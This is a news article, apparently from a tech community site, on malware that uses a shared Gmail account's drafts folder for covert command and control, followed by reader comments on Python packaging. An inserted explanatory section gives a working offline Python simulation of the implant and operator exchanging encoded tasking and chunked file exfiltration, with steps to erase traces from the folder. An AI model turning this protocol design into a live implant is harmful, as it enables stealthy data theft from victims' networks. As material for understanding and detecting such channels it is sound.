In his career-ending extramarital affair that came to light in 2012, General David Petraeus used a stealthy technique to communicate with his lover Paula Broadwell: the pair left messages for each other in the drafts folder of a shared Gmail account. Now hackers have learned the same trick. Only instead of a mistress, they’re sharing their love letters with data-stealing malware buried deep on a victim’s computer.
Here’s how the attack worked in the case Shape observed: The hacker first set up an anonymous Gmail account, then infected a computer on the target’s network with malware. (Shape declined to name the victim of the attack.) After gaining control of the target machine, the hacker opened their anonymous Gmail account on the victim’s computer in an invisible instance of Internet Explorer. Windows programs can drive IE through its COM automation interface to load and read web pages without showing a window, so the user has no idea a web page is even open on the computer.
With the Gmail drafts folder open and hidden, the malware uses a Python script to retrieve the commands and code that the hacker types into a draft. The malware responds with its own acknowledgments in the form of new drafts, along with the target data it’s programmed to exfiltrate from the victim’s network. Because the drafts are saved but never sent, no message ever leaves the account as mail. All the communication is encoded, so intrusion detection and data-loss-prevention systems see no recognizable commands or file contents in transit. Using a reputable web service over HTTPS instead of the IRC or custom HTTP channels hackers typically use to command their malware also helps keep the hack hidden, since the traffic looks like someone reading Gmail.
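An added example of the exchange described above, not code from the Shape report or from the malware itself: an offline simulation of the shared-drafts channel with both sides present. The Gmail drafts folder and the hidden Internet Explorer instance are replaced by an in-memory DraftsFolder class, the victim's files and the 32-byte chunk size are constructed for the demo, and the `op:`/`bot:` prefixes with base64-wrapped JSON are assumptions about the encoding, which the article does not detail.

```python
import base64
import json

# Constructed stand-in for the shared account's drafts folder. The real malware drove an
# invisible IE instance to read and write Gmail drafts; here a dict plays that role so the
# exchange runs offline. Drafts are saved and deleted, never sent: nothing traverses SMTP.
class DraftsFolder:
    def __init__(self):
        self._drafts = {}
        self._next_id = 1

    def save(self, body):
        draft_id = f"draft-{self._next_id}"
        self._next_id += 1
        self._drafts[draft_id] = body
        return draft_id

    def items(self):
        return list(self._drafts.items())  # snapshot, safe to mutate while iterating

    def delete(self, draft_id):
        self._drafts.pop(draft_id, None)

# Assumed encoding: a role prefix tells the two parties whose turn it is; base64 over JSON keeps
# command keywords and file contents out of any plaintext inspection of the draft bodies.
def pack(role, msg):
    return role + ":" + base64.b64encode(json.dumps(msg).encode()).decode()

def unpack(body):
    role, _, blob = body.partition(":")
    return role, json.loads(base64.b64decode(blob))

CHUNK = 32  # bytes of file content per exfil draft (assumed value)

class Implant:
    """Victim side: polls the drafts folder, runs tasking, replies with ack drafts."""
    def __init__(self, folder, files):
        self.folder = folder
        self.files = files  # constructed stand-in for the victim's filesystem

    def poll(self):
        for draft_id, body in self.folder.items():
            role, msg = unpack(body)
            if role != "op":
                continue
            self.folder.delete(draft_id)  # consume tasking so it is not executed twice
            self._execute(msg)

    def _execute(self, msg):
        if msg["cmd"] == "list":
            self.folder.save(pack("bot", {"task": msg["id"], "ack": "list",
                                          "names": sorted(self.files)}))
        elif msg["cmd"] == "get":
            data = self.files[msg["path"]]
            chunks = [data[i:i + CHUNK] for i in range(0, len(data), CHUNK)]
            for n, chunk in enumerate(chunks):  # one draft per chunk, numbered for reassembly
                self.folder.save(pack("bot", {"task": msg["id"], "ack": "get", "seq": n,
                                              "total": len(chunks),
                                              "data": base64.b64encode(chunk).decode()}))
        else:
            self.folder.save(pack("bot", {"task": msg["id"], "ack": "error",
                                          "reason": "unknown command"}))

class Operator:
    """Attacker side: writes tasking drafts, later collects and reassembles the replies."""
    def __init__(self, folder):
        self.folder = folder
        self._task_id = 0

    def task(self, **cmd):
        self._task_id += 1
        cmd["id"] = self._task_id
        self.folder.save(pack("op", cmd))
        return self._task_id

    def collect(self):
        results = {}
        for draft_id, body in self.folder.items():
            role, msg = unpack(body)
            if role != "bot":
                continue
            self.folder.delete(draft_id)  # clear the ack so the folder looks idle again
            results.setdefault(msg["task"], []).append(msg)
        for task_id, msgs in results.items():
            if msgs[0]["ack"] == "get":  # reassemble chunked file transfer in sequence order
                msgs.sort(key=lambda m: m["seq"])
                results[task_id] = b"".join(base64.b64decode(m["data"]) for m in msgs)
            else:
                results[task_id] = msgs[0]
        return results

def run_exchange():
    folder = DraftsFolder()
    files = {"notes.txt": b"quarterly numbers, do not forward",  # constructed victim data
             "secret.bin": bytes(range(80))}
    operator, implant = Operator(folder), Implant(folder, files)
    t_list = operator.task(cmd="list")
    t_get = operator.task(cmd="get", path="secret.bin")
    implant.poll()                # victim runs the tasking at its next polling interval
    results = operator.collect()  # attacker reads the acks; folder is empty afterwards
    return results, files, t_list, t_get, len(folder.items())

if __name__ == "__main__":
    results, files, t_list, t_get, remaining = run_exchange()
    print(results[t_list]["names"], results[t_get] == files["secret.bin"], remaining)
```

What the simulation makes visible is why the network side is hard to catch: every step is a draft being saved or deleted inside an HTTPS session to the mail provider, and the folder is empty again once both sides have consumed their messages. The more reliable place to look is the host, where the article's own description points at an Internet Explorer instance that the logged-in user never opened.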
(Score: 2) by arslan on Wednesday October 29 2014, @10:25PM
So if the victim's computer doesn't have python to begin with, it will install the runtime? Wouldn't that immediately be a red flag?
Nothing against the language.. although those "No curly braces" zealots can get a little annoying at times.
(Score: 1) by keithzg on Wednesday October 29 2014, @10:42PM
Well, you can compile Python code into Windows binaries trivially enough (see for example py2exe). In this day and age, the slight increase in space of the compiled exe probably isn't a big deal, and it's a hell of a lot easier to use that to call Windows APIs (which they'd probably have to do if they're actually using IE for this) than writing such from scratch, or (shudder) using Microsoft's compilers.
Not saying the story doesn't seem a bit weird, just that there's no reason to believe they'd actually need to rely on the normal runtime.
(Score: 2) by arslan on Thursday October 30 2014, @01:43AM
That is not running Python, it is running native code converted from py2exe. Your source is in Python. Unless I'm mistaken, the summary reads like it is running Python...